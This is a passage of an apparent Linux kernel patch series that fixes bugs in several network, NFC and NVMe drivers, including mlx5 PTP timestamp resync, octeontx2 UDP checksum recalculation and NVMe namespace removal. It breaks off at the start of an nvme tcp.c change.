++			(ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++	}
++
++	return &dev->stats;
++}
++
++
++/* for dev->set_multicast_list */
++static void set_rx_mode(struct net_device *dev)
++{
++	spinlock_t *lp = &((struct netdev_private *)netdev_priv(dev))->lock;
++	unsigned long flags;
++	spin_lock_irqsave(lp, flags);
++	__set_rx_mode(dev);
++	spin_unlock_irqrestore(lp, flags);
++}
++
++
++/* Take lock before calling */
++static void __set_rx_mode(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	u32 mc_filter[2];	/* Multicast hash filter */
++	u32 rx_mode;
++
++	if (dev->flags & IFF_PROMISC) {	/* Set promiscuous. */
++		memset(mc_filter, 0xff, sizeof(mc_filter));
++		rx_mode = CR_W_PROM | CR_W_AB | CR_W_AM;
++	} else if ((netdev_mc_count(dev) > multicast_filter_limit) ||
++		   (dev->flags & IFF_ALLMULTI)) {
++		/* Too many to match, or accept all multicasts. */
++		memset(mc_filter, 0xff, sizeof(mc_filter));
++		rx_mode = CR_W_AB | CR_W_AM;
++	} else {
++		struct netdev_hw_addr *ha;
++
++		memset(mc_filter, 0, sizeof(mc_filter));
++		netdev_for_each_mc_addr(ha, dev) {
++			unsigned int bit;
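++			/* The inverted top 6 CRC bits pick one of the 64
++			 * hash-filter bits split across MAR0/MAR1.
++			 */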
++			bit = (ether_crc(ETH_ALEN, ha->addr) >> 26) ^ 0x3F;
++			mc_filter[bit >> 5] |= (1 << bit);
++		}
++		rx_mode = CR_W_AB | CR_W_AM;
++	}
++
++	stop_nic_rxtx(ioaddr, np->crvalue);
++
++	iowrite32(mc_filter[0], ioaddr + MAR0);
++	iowrite32(mc_filter[1], ioaddr + MAR1);
++	np->crvalue &= ~CR_W_RXMODEMASK;
++	np->crvalue |= rx_mode;
++	iowrite32(np->crvalue, ioaddr + TCRRCR);
++}
++
++static void netdev_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	strscpy(info->driver, DRV_NAME, sizeof(info->driver));
++	strscpy(info->bus_info, pci_name(np->pci_dev), sizeof(info->bus_info));
++}
++
++static int netdev_get_link_ksettings(struct net_device *dev,
++				     struct ethtool_link_ksettings *cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	spin_lock_irq(&np->lock);
++	mii_ethtool_get_link_ksettings(&np->mii, cmd);
++	spin_unlock_irq(&np->lock);
++
++	return 0;
++}
++
++static int netdev_set_link_ksettings(struct net_device *dev,
++				     const struct ethtool_link_ksettings *cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int rc;
++
++	spin_lock_irq(&np->lock);
++	rc = mii_ethtool_set_link_ksettings(&np->mii, cmd);
++	spin_unlock_irq(&np->lock);
++
++	return rc;
++}
++
++static int netdev_nway_reset(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	return mii_nway_restart(&np->mii);
++}
++
++static u32 netdev_get_link(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	return mii_link_ok(&np->mii);
++}
++
++static u32 netdev_get_msglevel(struct net_device *dev)
++{
++	return debug;
++}
++
++static void netdev_set_msglevel(struct net_device *dev, u32 value)
++{
++	debug = value;
++}
++
++static const struct ethtool_ops netdev_ethtool_ops = {
++	.get_drvinfo		= netdev_get_drvinfo,
++	.nway_reset		= netdev_nway_reset,
++	.get_link		= netdev_get_link,
++	.get_msglevel		= netdev_get_msglevel,
++	.set_msglevel		= netdev_set_msglevel,
++	.get_link_ksettings	= netdev_get_link_ksettings,
++	.set_link_ksettings	= netdev_set_link_ksettings,
++};
++
++static int mii_ioctl(struct net_device *dev, struct ifreq *rq, int cmd)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int rc;
++
++	if (!netif_running(dev))
++		return -EINVAL;
++
++	spin_lock_irq(&np->lock);
++	rc = generic_mii_ioctl(&np->mii, if_mii(rq), cmd, NULL);
++	spin_unlock_irq(&np->lock);
++
++	return rc;
++}
++
++
++static int netdev_close(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	int i;
++
++	netif_stop_queue(dev);
++
++	/* Disable interrupts by clearing the interrupt mask. */
++	iowrite32(0x0000, ioaddr + IMR);
++
++	/* Stop the chip's Tx and Rx processes. */
++	stop_nic_rxtx(ioaddr, 0);
++
++	del_timer_sync(&np->timer);
++	del_timer_sync(&np->reset_timer);
++
++	free_irq(np->pci_dev->irq, dev);
++
++	/* Free all the skbuffs in the Rx queue. */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		struct sk_buff *skb = np->rx_ring[i].skbuff;
++
++		np->rx_ring[i].status = 0;
++		if (skb) {
++			dma_unmap_single(&np->pci_dev->dev,
++					 np->rx_ring[i].buffer, np->rx_buf_sz,
++					 DMA_FROM_DEVICE);
++			dev_kfree_skb(skb);
++			np->rx_ring[i].skbuff = NULL;
++		}
++	}
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		struct sk_buff *skb = np->tx_ring[i].skbuff;
++
++		if (skb) {
++			dma_unmap_single(&np->pci_dev->dev,
++					 np->tx_ring[i].buffer, skb->len,
++					 DMA_TO_DEVICE);
++			dev_kfree_skb(skb);
++			np->tx_ring[i].skbuff = NULL;
++		}
++	}
++
++	return 0;
++}
++
++static const struct pci_device_id fealnx_pci_tbl[] = {
++	{0x1516, 0x0800, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0},
++	{0x1516, 0x0803, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 1},
++	{0x1516, 0x0891, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 2},
++	{} /* terminate list */
++};
++MODULE_DEVICE_TABLE(pci, fealnx_pci_tbl);
++
++
++static struct pci_driver fealnx_driver = {
++	.name		= "fealnx",
++	.id_table	= fealnx_pci_tbl,
++	.probe		= fealnx_init_one,
++	.remove		= fealnx_remove_one,
++};
++
++module_pci_driver(fealnx_driver);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 684cb8ec9f21b..10e11262d48a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -793,7 +793,7 @@ static int otx2_prepare_ipv6_flow(struct ethtool_rx_flow_spec *fsp,
+ 
+ 		/* NPC profile doesn't extract AH/ESP header fields */
+ 		if ((ah_esp_mask->spi & ah_esp_hdr->spi) ||
+-		    (ah_esp_mask->tclass & ah_esp_mask->tclass))
++		    (ah_esp_mask->tclass & ah_esp_hdr->tclass))
+ 			return -EOPNOTSUPP;
+ 
+ 		if (flow_type == AH_V6_FLOW)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index ef10aef3cda02..7045fedfd73a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -10,6 +10,7 @@
+ #include <net/tso.h>
+ #include <linux/bpf.h>
+ #include <linux/bpf_trace.h>
++#include <net/ip6_checksum.h>
+ 
+ #include "otx2_reg.h"
+ #include "otx2_common.h"
+@@ -699,7 +700,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 
+ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 			     int alg, u64 iova, int ptp_offset,
+-			     u64 base_ns, int udp_csum)
++			     u64 base_ns, bool udp_csum_crt)
+ {
+ 	struct nix_sqe_mem_s *mem;
+ 
+@@ -711,7 +712,7 @@ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 
+ 	if (ptp_offset) {
+ 		mem->start_offset = ptp_offset;
+-		mem->udp_csum_crt = udp_csum;
++		mem->udp_csum_crt = !!udp_csum_crt;
+ 		mem->base_ns = base_ns;
+ 		mem->step_type = 1;
+ 	}
+@@ -986,10 +987,11 @@ static bool otx2_validate_network_transport(struct sk_buff *skb)
+ 	return false;
+ }
+ 
+-static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
++static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, bool *udp_csum_crt)
+ {
+ 	struct ethhdr *eth = (struct ethhdr *)(skb->data);
+ 	u16 nix_offload_hlen = 0, inner_vhlen = 0;
++	bool udp_hdr_present = false, is_sync;
+ 	u8 *data = skb->data, *msgtype;
+ 	__be16 proto = eth->h_proto;
+ 	int network_depth = 0;
+@@ -1029,45 +1031,81 @@ static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
+ 		if (!otx2_validate_network_transport(skb))
+ 			return false;
+ 
+-		*udp_csum = 1;
+ 		*offset = nix_offload_hlen + skb_transport_offset(skb) +
+ 			  sizeof(struct udphdr);
++		udp_hdr_present = true;
++
+ 	}
+ 
+ 	msgtype = data + *offset;
+-
+ 	/* Check PTP messageId is SYNC or not */
+-	return (*msgtype & 0xf) == 0;
++	is_sync = !(*msgtype & 0xf);
++	if (is_sync)
++		*udp_csum_crt = udp_hdr_present;
++	else
++		*offset = 0;
++
++	return is_sync;
+ }
+ 
+ static void otx2_set_txtstamp(struct otx2_nic *pfvf, struct sk_buff *skb,
+ 			      struct otx2_snd_queue *sq, int *offset)
+ {
++	struct ethhdr	*eth = (struct ethhdr *)(skb->data);
+ 	struct ptpv2_tstamp *origin_tstamp;
+-	int ptp_offset = 0, udp_csum = 0;
++	bool udp_csum_crt = false;
++	unsigned int udphoff;
+ 	struct timespec64 ts;
++	int ptp_offset = 0;
++	__wsum skb_csum;
+ 	u64 iova;
+ 
+ 	if (unlikely(!skb_shinfo(skb)->gso_size &&
+ 		     (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP))) {
+-		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC)) {
+-			if (otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum)) {
+-				origin_tstamp = (struct ptpv2_tstamp *)
+-						((u8 *)skb->data + ptp_offset +
+-						 PTP_SYNC_SEC_OFFSET);
+-				ts = ns_to_timespec64(pfvf->ptp->tstamp);
+-				origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
+-				origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
+-				origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
+-				/* Point to correction field in PTP packet */
+-				ptp_offset += 8;
++		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC &&
++			     otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum_crt))) {
++			origin_tstamp = (struct ptpv2_tstamp *)
++					((u8 *)skb->data + ptp_offset +
++					 PTP_SYNC_SEC_OFFSET);
++			ts = ns_to_timespec64(pfvf->ptp->tstamp);
++			origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
++			origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
++			origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
++			/* Point to correction field in PTP packet */
++			ptp_offset += 8;
++
++			/* When the user disables hw checksumming, the stack
++			 * calculates the csum, but it does not cover the ptp
++			 * timestamp, which is added later. Recalculate the
++			 * checksum manually, taking the timestamp into account.
++			 */
++			if (udp_csum_crt) {
++				struct udphdr *uh = udp_hdr(skb);
++
++				if (skb->ip_summed != CHECKSUM_PARTIAL && uh->check != 0) {
++					udphoff = skb_transport_offset(skb);
++					uh->check = 0;
++					skb_csum = skb_checksum(skb, udphoff, skb->len - udphoff,
++								0);
++					if (ntohs(eth->h_proto) == ETH_P_IPV6)
++						uh->check = csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
++									    &ipv6_hdr(skb)->daddr,
++									    skb->len - udphoff,
++									    ipv6_hdr(skb)->nexthdr,
++									    skb_csum);
++					else
++						uh->check = csum_tcpudp_magic(ip_hdr(skb)->saddr,
++									      ip_hdr(skb)->daddr,
++									      skb->len - udphoff,
++									      IPPROTO_UDP,
++									      skb_csum);
++				}
+ 			}
+ 		} else {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 		}
+ 		iova = sq->timestamps->iova + (sq->head * sizeof(u64));
+ 		otx2_sqe_add_mem(sq, offset, NIX_SENDMEMALG_E_SETTSTMP, iova,
+-				 ptp_offset, pfvf->ptp->base_ns, udp_csum);
++				 ptp_offset, pfvf->ptp->base_ns, udp_csum_crt);
+ 	} else {
+ 		skb_tx_timestamp(skb);
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index cdc87ecae5d39..d000236ddbac5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -90,4 +90,8 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
++
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]);
++	if (err)
++		mlx5_core_warn(dev, "Timeout reclaiming external host VFs pages err(%d)\n", err);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index 8469e9c386706..ae75e230170b5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -86,7 +86,19 @@ static bool mlx5e_ptp_ts_cqe_drop(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb
+ 	return (ptpsq->ts_cqe_ctr_mask && (skb_cc != skb_id));
+ }
+ 
+-static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb_id)
++static bool mlx5e_ptp_ts_cqe_ooo(struct mlx5e_ptpsq *ptpsq, u16 skb_id)
++{
++	u16 skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
++	u16 skb_pc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_pc);
++
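++	/* skb_id is out of order if it falls outside the [cc, pc) window of
++	 * in-flight skbs, with all distances computed modulo the fifo size.
++	 */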
++	if (PTP_WQE_CTR2IDX(skb_id - skb_cc) >= PTP_WQE_CTR2IDX(skb_pc - skb_cc))
++		return true;
++
++	return false;
++}
++
++static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc,
++					     u16 skb_id, int budget)
+ {
+ 	struct skb_shared_hwtstamps hwts = {};
+ 	struct sk_buff *skb;
+@@ -98,6 +110,7 @@ static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_
+ 		hwts.hwtstamp = mlx5e_skb_cb_get_hwts(skb)->cqe_hwtstamp;
+ 		skb_tstamp_tx(skb, &hwts);
+ 		ptpsq->cq_stats->resync_cqe++;
++		napi_consume_skb(skb, budget);
+ 		skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
+ 	}
+ }
+@@ -118,8 +131,14 @@ static void mlx5e_ptp_handle_ts_cqe(struct mlx5e_ptpsq *ptpsq,
+ 		goto out;
+ 	}
+ 
+-	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id))
+-		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id);
++	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id)) {
++		if (mlx5e_ptp_ts_cqe_ooo(ptpsq, skb_id)) {
++			/* already handled by a previous resync */
++			ptpsq->cq_stats->ooo_cqe_drop++;
++			return;
++		}
++		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id, budget);
++	}
+ 
+ 	skb = mlx5e_skb_fifo_pop(&ptpsq->skb_fifo);
+ 	hwtstamp = mlx5e_cqe_ts_to_ns(sq->ptp_cyc2time, sq->clock, get_cqe_ts(cqe));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 853f312cd7572..1b3a65325ece1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -81,7 +81,7 @@ void mlx5e_free_txqsq_descs(struct mlx5e_txqsq *sq);
+ static inline bool
+ mlx5e_skb_fifo_has_room(struct mlx5e_skb_fifo *fifo)
+ {
+-	return (*fifo->pc - *fifo->cc) < fifo->mask;
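++	/* Cast to u16 so the pc - cc distance stays correct across counter
++	 * wraparound.
++	 */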
++	return (u16)(*fifo->pc - *fifo->cc) < fifo->mask;
+ }
+ 
+ static inline bool
+@@ -297,6 +297,8 @@ void mlx5e_skb_fifo_push(struct mlx5e_skb_fifo *fifo, struct sk_buff *skb)
+ static inline
+ struct sk_buff *mlx5e_skb_fifo_pop(struct mlx5e_skb_fifo *fifo)
+ {
++	WARN_ON_ONCE(*fifo->pc == *fifo->cc);
++
+ 	return *mlx5e_skb_fifo_get(fifo, (*fifo->cc)++);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+index 6687b8136e441..4478223c17209 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+@@ -2138,6 +2138,7 @@ static const struct counter_desc ptp_cq_stats_desc[] = {
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, abort_abs_diff_ns) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_cqe) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_event) },
++	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, ooo_cqe_drop) },
+ };
+ 
+ static const struct counter_desc ptp_rq_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+index 375752d6546d5..b77100b60b505 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+@@ -461,6 +461,7 @@ struct mlx5e_ptp_cq_stats {
+ 	u64 abort_abs_diff_ns;
+ 	u64 resync_cqe;
+ 	u64 resync_event;
++	u64 ooo_cqe_drop;
+ };
+ 
+ struct mlx5e_rep_stats {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index c981fa77f4398..f3b74cb67b71c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -1070,7 +1070,8 @@ mlx5_eswitch_add_send_to_vport_rule(struct mlx5_eswitch *on_esw,
+ 	dest.vport.flags |= MLX5_FLOW_DEST_VPORT_VHCA_ID;
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+-	if (rep->vport == MLX5_VPORT_UPLINK)
++	if (MLX5_CAP_ESW_FLOWTABLE(on_esw->dev, flow_source) &&
++	    rep->vport == MLX5_VPORT_UPLINK)
+ 		spec->flow_context.flow_source = MLX5_FLOW_CONTEXT_FLOW_SOURCE_LOCAL_VPORT;
+ 
+ 	flow_rule = mlx5_add_flow_rules(mlx5_eswitch_get_slow_fdb(on_esw),
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+index 23361a9ae4fa0..6dc83e871cd76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+@@ -105,6 +105,7 @@ int mlx5_geneve_tlv_option_add(struct mlx5_geneve *geneve, struct geneve_opt *op
+ 		geneve->opt_type = opt->type;
+ 		geneve->obj_id = res;
+ 		geneve->refcount++;
++		res = 0;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 3008e9ce2bbff..20d7662c10fb6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,6 +147,10 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
++	/* For ECPFs, skip waiting for host VF pages until ECPF is destroyed */
++	if (mlx5_core_is_ecpf(dev))
++		return;
++
+ 	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index 1c16548415cdd..b0c7ab74a82ed 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2894,8 +2894,10 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 		goto err_out_clear_quattro;
+ 	}
+ 
+-	hpreg_res = devm_request_region(&pdev->dev, pci_resource_start(pdev, 0),
+-					pci_resource_len(pdev, 0), DRV_NAME);
++	hpreg_res = devm_request_mem_region(&pdev->dev,
++					    pci_resource_start(pdev, 0),
++					    pci_resource_len(pdev, 0),
++					    DRV_NAME);
+ 	if (!hpreg_res) {
+ 		err = -EBUSY;
+ 		dev_err(&pdev->dev, "Cannot obtain PCI resources, aborting.\n");
+diff --git a/drivers/net/mdio/mdio-mscc-miim.c b/drivers/net/mdio/mdio-mscc-miim.c
+index 51f68daac152f..34b87389788bb 100644
+--- a/drivers/net/mdio/mdio-mscc-miim.c
++++ b/drivers/net/mdio/mdio-mscc-miim.c
+@@ -52,6 +52,7 @@ struct mscc_miim_info {
+ struct mscc_miim_dev {
+ 	struct regmap *regs;
+ 	int mii_status_offset;
++	bool ignore_read_errors;
+ 	struct regmap *phy_regs;
+ 	const struct mscc_miim_info *info;
+ 	struct clk *clk;
+@@ -138,7 +139,7 @@ static int mscc_miim_read(struct mii_bus *bus, int mii_id, int regnum)
+ 		goto out;
+ 	}
+ 
+-	if (val & MSCC_MIIM_DATA_ERROR) {
++	if (!miim->ignore_read_errors && !!(val & MSCC_MIIM_DATA_ERROR)) {
+ 		ret = -EIO;
+ 		goto out;
+ 	}
+@@ -218,7 +219,8 @@ static const struct regmap_config mscc_miim_phy_regmap_config = {
+ };
+ 
+ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+-		    struct regmap *mii_regmap, int status_offset)
++		    struct regmap *mii_regmap, int status_offset,
++		    bool ignore_read_errors)
+ {
+ 	struct mscc_miim_dev *miim;
+ 	struct mii_bus *bus;
+@@ -240,6 +242,7 @@ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+ 
+ 	miim->regs = mii_regmap;
+ 	miim->mii_status_offset = status_offset;
++	miim->ignore_read_errors = ignore_read_errors;
+ 
+ 	*pbus = bus;
+ 
+@@ -291,7 +294,7 @@ static int mscc_miim_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy_regmap),
+ 				     "Unable to create phy register regmap\n");
+ 
+-	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0);
++	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0, false);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Unable to setup the MDIO bus\n");
+ 		return ret;
+diff --git a/drivers/nfc/st-nci/se.c b/drivers/nfc/st-nci/se.c
+index ec87dd21e054a..b2f1ced8e6dd2 100644
+--- a/drivers/nfc/st-nci/se.c
++++ b/drivers/nfc/st-nci/se.c
+@@ -672,6 +672,12 @@ int st_nci_se_io(struct nci_dev *ndev, u32 se_idx,
+ 					ST_NCI_EVT_TRANSMIT_DATA, apdu,
+ 					apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nfc/st21nfca/se.c b/drivers/nfc/st21nfca/se.c
+index df8d27cf2956b..dae288bebcb5a 100644
+--- a/drivers/nfc/st21nfca/se.c
++++ b/drivers/nfc/st21nfca/se.c
+@@ -236,6 +236,12 @@ int st21nfca_hci_se_io(struct nfc_hci_dev *hdev, u32 se_idx,
+ 					ST21NFCA_EVT_TRANSMIT_DATA,
+ 					apdu, apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 8b64211411626..fbed8d1a02ef4 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -38,6 +38,7 @@ struct nvme_ns_info {
+ 	bool is_shared;
+ 	bool is_readonly;
+ 	bool is_ready;
++	bool is_removed;
+ };
+ 
+ unsigned int admin_timeout = 60;
+@@ -1445,16 +1446,8 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	error = nvme_submit_sync_cmd(ctrl->admin_q, &c, *id, sizeof(**id));
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+-		goto out_free_id;
++		kfree(*id);
+ 	}
+-
+-	error = NVME_SC_INVALID_NS | NVME_SC_DNR;
+-	if ((*id)->ncap == 0) /* namespace not allocated or attached */
+-		goto out_free_id;
+-	return 0;
+-
+-out_free_id:
+-	kfree(*id);
+ 	return error;
+ }
+ 
+@@ -1468,6 +1461,13 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	ret = nvme_identify_ns(ctrl, info->nsid, &id);
+ 	if (ret)
+ 		return ret;
++
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		return -ENODEV;
++	}
++
+ 	info->anagrpid = id->anagrpid;
+ 	info->is_shared = id->nmic & NVME_NS_NMIC_SHARED;
+ 	info->is_readonly = id->nsattr & NVME_NS_ATTR_RO;
+@@ -4418,6 +4418,7 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ {
+ 	struct nvme_ns_info info = { .nsid = nsid };
+ 	struct nvme_ns *ns;
++	int ret;
+ 
+ 	if (nvme_identify_ns_descs(ctrl, &info))
+ 		return;
+@@ -4434,19 +4435,19 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ 	 * set up a namespace.  If not fall back to the legacy version.
+ 	 */
+ 	if ((ctrl->cap & NVME_CAP_CRMS_CRIMS) ||
+-	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS)) {
+-		if (nvme_ns_info_from_id_cs_indep(ctrl, &info))
+-			return;
+-	} else {
+-		if (nvme_ns_info_from_identify(ctrl, &info))
+-			return;
+-	}
++	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS))
++		ret = nvme_ns_info_from_id_cs_indep(ctrl, &info);
++	else
++		ret = nvme_ns_info_from_identify(ctrl, &info);
++
++	if (info.is_removed)
++		nvme_ns_remove_by_nsid(ctrl, nsid);
+ 
+ 	/*
+ 	 * Ignore the namespace if it is not ready. We will get an AEN once it
+ 	 * becomes ready and restart the scan.
+ 	 */
+-	if (!info.is_ready)
++	if (ret || !info.is_ready)
+ 		return;
+ 
+ 	ns = nvme_find_get_ns(ctrl, nsid);
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index a6e22116e1396..dcac3df8a5f76 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -189,7 +189,8 @@ nvmf_ctlr_matches_baseopts(struct nvme_ctrl *ctrl,
+ 
+ static inline char *nvmf_ctrl_subsysnqn(struct nvme_ctrl *ctrl)
+ {
+-	if (!ctrl->subsys)
++	if (!ctrl->subsys ||
++	    !strcmp(ctrl->opts->subsysnqn, NVME_DISC_SUBSYS_NAME))
+ 		return ctrl->opts->subsysnqn;
+ 	return ctrl->subsys->subnqn;
+ }
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 8cedc1ef496c7..1ca52ac163c2f 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2486,6 +2486,10 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 
